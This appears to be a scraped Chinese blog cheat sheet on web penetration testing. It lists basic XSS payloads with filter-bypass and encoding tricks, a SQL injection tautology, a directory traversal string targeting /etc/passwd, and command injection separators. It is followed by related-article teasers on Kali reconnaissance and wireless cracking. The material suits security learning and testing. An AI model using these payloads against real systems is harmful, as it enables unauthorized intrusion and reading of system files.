WEP渗透总结

一、XSS

  <script>alert(1)</script> (大小写)

  <scr<script>ipt>alert(1)</scr</script>ipt>二次构造

  <img src=‘#‘ onerror=‘alert(1)‘ />

  <script>eval("\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29")</script>

  <img src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">

二、SQL注入

  ?name=root‘ or ‘1‘=‘1(TAB代替空格、注释/**/)

三、Directory traversal

  ../../../../etc/passwd%00

四、Command injection

  `id`

  && id(&编码为%26)

  || id

  换行符(%0a)

附:HTML URL编码 http://www.w3cschool.cn/html_ref_urlencode.html

  

  

WEP渗透总结,布布扣,bubuko.com

时间: 2024-08-15 01:51:04

WEP渗透总结的相关文章

小白日记7:kali渗透测试之主动信息收集-发现(一)--二层发现:arping/shell脚本,Netdiscover,scapy

主动信息收集 被动信息收集可能不准确,可以用主动信息收集验证 特点:直接与目标系统交互通信,无法避免留下访问痕迹 解决方法:1.使用受控的第三方电脑进行探测,使用代理 (做好被封杀的准备) 2.伪造大量的来源IP进行探测,进行噪声迷惑,淹没真是的探测流量 扫描流程:发送不同的探测,根据返回结果判断目标状态[IP层->端口层->服务层] 发现 识别活着的主机,发现潜在的被攻击目标,输出结果为IP地址列表. 二层发现 数据电路层,使用ARP协议 使用场景:已经取得一台主机,进入内网,对内网进行渗透

企业级无线渗透与无线数据浅析

0x00 企业级无线渗透 注: 这篇文章里我详细说一下针对企业802.1X的安全解析,还有一些针对数据协议的分析方法和浅析关于个人渗透太多太啰嗦我就不写了,有机会在说. 因为我不想一部分一部分的写,所以索性就把三个内容写在了一起,如果大家觉得那里有问题,欢迎指正与交流. 一.关于网卡 工欲善其事,必先利其器.在无线渗透或者是无线攻击中,并不是任何支持linux的网卡都支持无线工具的.推荐过一款网卡 :‘AWUS036H’我用过这款网卡,是RT8187芯片的.确实不错,完美的支持工具.当然,也可以

【转载】扫描渗透等工具介绍

#1 Nessus:最好的UNIX漏洞扫描工具 Nessus 是最好的免费网络漏洞扫描器,它可以运行于几乎所有的UNIX平台之上.它不止永久升级,还免费提供多达11000种插件(但需要注册并接受EULA-acceptance--终端用户授权协议).它的主要功能是远程或本地(已授权的)安全检查,客户端/服务器架构,GTK(Linux下的一种图形界面)图形界面,内置脚本语言编译器,可以用其编写自定义插件,或用来阅读别人写的插件.Nessus 3 已经开发完成(now closed source),其

Kali Linux无线网络渗透测试教程(大学霸内部资料)

Kali Linux无线网络渗透测试教程(大学霸内部资料) 介绍:本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试.教程包括无线网络监听.信息收集.路由器渗透测试.客户端渗透测试四大部分.内容涉及网络扫描.Wireshark抓包分析.WPS/WEP/WPA/WAP+Radius破解.漏洞扫描等技术.本教程基于Kali Linux专门讲解针对无线网络WiFi如何进行渗透测试.其中,详细揭示了无线网络的各种安全缺陷和容易被利用的漏洞. Kali Linux无线网络渗透测试 试

全能无线渗透测试工具,一个LAZY就搞定了

近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦.就想看看是否可以有一款功能全面的集合型工具. 正所谓功夫不负有心人,还真有这么一个工具出现在我的眼前.它便是名为LAZY script应用于Kali Linux下的执行脚本.该脚本可以自动执行有关Wi-Fi穿透和黑客攻击的绝大部分应用程序,同时它还集合了大量不同类型的攻击程序,可谓是集众家之长于一身.这么好的东西,必须和各位小伙伴一起分享. 其实,这样一款好的工具,不仅可以让从事

扫描渗透等工具介绍

#1 Nessus:最好的UNIX漏洞扫描工具 Nessus 是最好的免费网络漏洞扫描器,它可以运行于几乎所有的UNIX平台之上.它不止永久升级,还免费提供多达11000种插件(但需要注册并接受EULA-acceptance--终端用户授权协议).它的主要功能是远程或本地(已授权的)安全检查,客户端/服务器架构,GTK(Linux下的一种图形界面)图形界面,内置脚本语言编译器,可以用其编写自定义插件,或用来阅读别人写的插件.Nessus 3 已经开发完成(now closed source),其

从无线安全到内网渗透(转)

前一阵子很火的Evi1m0牛写的那篇<蹭网之后,能做些什么?>,不知各位童鞋看过没?还有闹得沸沸扬扬的路由器安全漏洞可能大家也都耳闻了,你觉得你家路由器还安全吗:)路由器安全真是越来越火了,有句话说的落后就要挨打啊,那么今天我就给各位童鞋科普下无线网络安全的知识,你以为加个密就万无一失了吗,突破这第一道防线轻松带微笑有木有,WiFi在手,天下我有~ 1.神兵利器 俗话说的好,巧妇难为无米之炊,这是需要硬件支持的,你需要买一张USB无线网卡.当然网卡也不是随便都行的,特定的芯片对破解算法支持比较

从无线安全到内网渗透

前一阵子很火的Evi1m0牛写的那篇<蹭网之后,能做些什么?>,不知各位童鞋看过没?还有闹得沸沸扬扬的路由器安全漏洞可能大家也都耳闻了,你 觉得你家路由器还安全吗:)路由器安全真是越来越火了,有句话说的落后就要挨打啊,那么今天我就给各位童鞋科普下无线网络安全的知识,你以为加个密就万无 一失了吗,突破这第一道防线轻松带微笑有木有,WiFi在手,天下我有~ 1.神兵利器 俗话说的好,巧妇难为无米之炊,这是需要硬件支持的,你需要买一张USB无线网卡.当然网卡也不是随便都行的,特定的芯片对破解算法支持

无线网络渗透之旅

http://www.myhack58.com/Article/html/3/8/2010/26313.htm [0x00] - 简介[0x01] - 无线网络安全 [0x02] - 突破简单防御 [0x02a] - 绕过 MAC 过滤[0x02b] - 发觉隐藏的 SSID [0x02c] - 嗅探空中信息 [0x03] - 破解工具 [0x03a] - Aircrack-ng 套件[0x03b] - 使用 airdecap-ng 解密数据包 [0x03c] - 使用 airdecloak-n